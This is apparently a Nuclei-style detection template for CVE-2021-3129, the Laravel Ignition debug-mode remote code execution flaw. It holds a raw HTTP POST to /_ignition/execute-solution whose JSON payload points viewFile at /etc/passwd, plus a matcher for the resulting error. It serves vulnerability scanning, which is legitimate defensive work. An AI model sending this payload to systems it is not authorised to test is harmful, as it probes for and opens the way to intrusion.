id: CVE-2021-3129

info:
  name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION
  author: z3bd
  severity: critical
  description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
  reference: https://www.ambionics.io/blog/laravel-debug-rce
  tags: cve,cve2021,laravel,rce

  # Note:- This is detection template, use the referenced article for detailed exploit.

requests:
  - raw:
      - |
        POST /_ignition/execute-solution HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: deflate
        Accept: application/json
        Connection: close
        Content-Length: 144
        Content-Type: application/json

        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "test", "viewFile": "/etc/passwd"}}

    matchers:
      - type: word
        words:
          - "failed to open stream: Permission denied"